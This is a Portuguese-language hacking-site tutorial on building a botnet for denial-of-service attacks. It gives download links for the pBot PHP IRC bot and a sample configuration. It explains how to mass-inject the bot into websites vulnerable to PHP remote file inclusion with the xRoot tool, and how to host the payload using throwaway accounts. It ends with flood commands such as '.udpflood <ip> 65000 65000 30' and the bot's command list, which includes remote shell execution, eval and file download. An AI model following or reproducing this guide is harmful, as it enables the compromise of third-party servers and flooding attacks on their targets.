Criar um Site Grátis Fantástico
Translate to English Translate to Spanish Translate to French Translate to German Google-Translate-Portuguese to Italian Translate to Russian Translate to Chinese Translate to Japanese
Hacker
vc gostou do site?
sim
não
Ver Resultados

Rating: 3.3/5 (391 votos)

ONLINE
3


todos hacker aki!!



Denial of service com [BOTNETS]

Denial of service com [BOTNETS]

O que sao botnets? > Como o próprio nome já deixa claro, as botnets são basicamente redes de computadores infectados por bots semelhantes. Para quem propaga esse tipo de ameaça, ter centenas de computadores ligados com bots sob o seu comando é a maneira mais eficaz de espalhar os perigos propostos pelo aplicativo, na tentativa de fraudar e enganar os usuários.

.::Caso queira uma video aula esta abaixo::.

https://www.youtube.com/watch?v=ZbApNARd6lg&feature=youtu.be


.::Downloads::.

https://www.mirc.com/ < mIRC - Cliente "oficial" do mIRC. Você também pode baixar scripts como CyberScript, ou até mesmo usar o ChatZilla que é uma extenção para Firefox, vai de sua preferência.

https://www.4shared.com/office/A98m7qj2/Pbot.html < Pbot esta em txt, mas voce pode muda-la para php.

https://www.4shared.com/rar/Ccg4xheD/xRoot_Triad_List_Sites_Editor.html < Xroot / TriadList


.::Configurando o pBot ::.

A configuração do pBot é muito simples. A configuração começa na linha número 8. Localize essa parte no script, e vamos então configurar:

var $config = array("server"=>"irc.chatbr.org",
                     "port"=>6667,
                     "pass"=>"ykky",
                     "prefix"=>"ykky",
                     "maxrand"=>8,
                     "chan"=>"#yakuzaa",
                     "key"=>"",
                     "modes"=>"+iB-x",
                     "password"=>"b0t",
                     "trigger"=>".",
                     "hostauth"=>"*" // * for any hostname
                     );



server: Nessa parte da configuração você deve colocar a rede em que os bots vão conectar. Ali eu coloquei irc.chatbr.org, que é uma rede muito boa.
port: Porta da rede. A porta padrão é 6667.
pass: Você deve colocar a senha para logar no bot. Sem a senha, você não executa comandos. No caso, a senha que eu escolhi foi ykky.
prefix: O nome dos bots são gerados randomicamente. Entretanto, o prefix fica no meio do nome do bot. Exemplo de nome: [A]ykky02340371.
chan: Insira o nome do canal onde os bots vão conectar, e por onde você vai comandar os bots.
password: Caso o canal esteja em modo "+k", ou seja, canal com chave (key), coloque a senha do canal.

O resto das configurações vocês podem deixar assim mesmo.

Para prosseguir voce precisa de uma lista de sites vulneraveis a php injection...
ja com a lista em maos....


.::Arrumando a lista::.


Para rodar os bots, vocês vão ter que ter uma lista de sites vulneráveis a PHP Injection.
Abra o programa (-TRIAD-) List Sites Editor.exe, clique no botão abrir e selecione a lista de sites vulneráveis.
Na parte "Remover da URL:", coloque um "=" (sem aspas) no campo de texto do "Tudo que estiver a FRENTE de:" e então cliquem no Go.
Agora todos os sites estão só até o "=".
Copie todos os sites usando o Control+C ao invés do botão Salvar. O botão Salvar, grava todos os sites em um arquivo *.rtf ao invés de *.txt.
Agora cole usando Control+V no Blobo de notas e salve o arquivo.

Imagem



.::Upando o pBot::.

O pbot que voce fez o download a cima esta em formato txt, entao voce precisa de um host para upa-lo, eu recomendo o site:https://www.fileden.com ( detalhe voce tera que criar uma conta nova toda semana, eles nao tem confirmacao de entao voce pode usar emails inexistentes.


.::Rodando os Bots::.

Agora chegou a hora de usar o xRoot. Abrindo o xRoot, vamos até a aba Scan.
Vamos clicar no botão Abrir lista e selecionar a lista que filtramos com o Triad List Sites.

Já com o pBot configurado e upado em algum host, colocamos o link do pBot no campo de texto referente a "CMD pra por:" (não se esqueçam de deixar o "?" depois do .txt. Em "Achar:" pode deixar em branco, afinal é só pro xRoot visitar site por site da lista mesmo.
Agora devemos clicar no botão "Por CMD" e aguardar o xRoot inserir a cmd nas urls.
Depois de colocar a CMD após o "=" com o xRoot, é só clicar no botão "Testar sites...".
Agora como o xRoot visita site por site procurando por vulneráveis, logo os bots vão rodar automaticamente, facilitando muito as coisas!

Imagem


Imagem retirada do forum invaders

Imagem

.::Logando nas bots::.

Sem você fazer o login nos bots, eles não te respondem aos comandos.
Para fazer o login, você deve usar o comando .user <senha>.
A senha é aquela que você definiu na parte de configuração do pBot.
Para logar, vou usar o comando .user b0t, onde "b0t" foi a senha que eu escolhi para fazer esse tutorial.

.::Atacando::.

O pBot pode fazer UDP Flood e TCP Flood.
Eu já vi algumas botnets em perl que fazem até syn flood, mas eu curto o pBot :mrgreen: 
Para pacotar: .udpflood <target> <packets> <packetsize> <delay>.
Eu vou usar 65000 packets, 65000 de packetsize e o delay eu usarei 30.
Então usarei: .udpflood <ip> 65000 65000 30

.::Outros comandos::.

= COMMANDS ================================================== ==========================
.user <password> //login to the bot
.logout //logout of the bot
.die //kill the bot
.restart //restart the bot
.mail <to> <from> <subject> <msg> //send an email
.dns <IP|HOST> //dns lookup
.download <URL> <filename> //download a file
.exec <cmd> // uses shell_exec() //execute a command
.cmd <cmd> // uses popen() //execute a command
.info //get system information
.php <php code> // uses eval() //execute php code
.tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
.udpflood <target> <packets> <packetsize> <delay> //udpflood attack
.raw <cmd> //raw IRC command
.rndnick //change nickname
.pscan <host> <port> //port scan
.ud.server <newhost> <newport> [newpass] //change IRC server
---------------------------------------------------------------------------------------




Creditos: Fvox por algumas imagens e alguns textos.